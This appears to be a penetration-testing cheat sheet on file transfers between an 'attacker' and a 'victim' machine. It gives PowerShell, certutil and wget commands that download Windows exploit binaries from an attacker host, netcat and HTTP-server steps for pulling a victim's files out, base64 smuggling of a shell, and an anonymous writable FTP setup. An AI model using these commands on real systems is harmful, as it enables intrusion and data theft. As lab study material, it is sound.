File Transfers
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.8/exploits/MS16-135.ps1','c:\Users\Public\Downloads\ms16.ps')"
powershell wget "http://10.10.14.4/bfill.exe" -outfile "exploit.exe"
certutil -urlcache -f http://10.10.14.8/ms15-051x64.exe ms15.exe
Attacker: sudo impacket-smbserver tran .
Victim: copy \\10.10.10.10\tran\file.exe file.exe
Attacker: sudo impacket-smbserver tran .
Victim: New-PSDrive -Name "temp" -PSProvider "FileSystem" -Root "\\10.10.14.7\temp"
#To get a file from victim machine to attacking machine
Attacker: nc -nlvp 4444 > file.txt
Victim: nc 10.10.10.10 4444 < file.txt
Attacker: python -m SimpleHTTPServer 80
Victim: wget 10.10.10.10/file.txt
Attacker: python -m SimpleHTTPServer 80
Victim: curl 10.10.10.10 -o test.txt
certutil.exe -urlcache -split -f http://example/file.txt file.blah
wget -O test.txt IP
Attacker: base64 exploit -w 0 | base64 string will be generated of exploit file
Victim: echo <base64string> | base64 -d > shell
scp linenum.sh user@IP:/tmp/linenum.sh
scp -i KEY chisel user@target:/tmp/chisel-USERNAME
#Modify the /etc/vsftpd.conf file with the following contents:
# Standalone mode
listen=YES
max_clients=200
max_per_ip=4
# Access rights
anonymous_enable=YES
local_enable=NO
write_enable=YES
anon_upload_enable=YES
anon_mkdir_write_enable=YES
anon_other_write_enable=YES
# Security
anon_world_readable_only=NO
connect_from_port_20=YES
hide_ids=YES
pasv_min_port=50000
pasv_max_port=60000
# Features
xferlog_enable=YES
ls_recurse_enable=NO
ascii_download_enable=NO
async_abor_enable=YES
# Performance
one_process_model=YES
idle_session_timeout=120
data_connection_timeout=300
accept_timeout=60
connect_timeout=60
anon_max_rate=50000
anon_mkdir_write_enable=YES
anon_other_write_enable=YES
anon_root=/home/kali/
#Restart the vsftpd service
systemctl restart vsftpd
#Connect to the ftp service normally
Last updated
Was this helpful?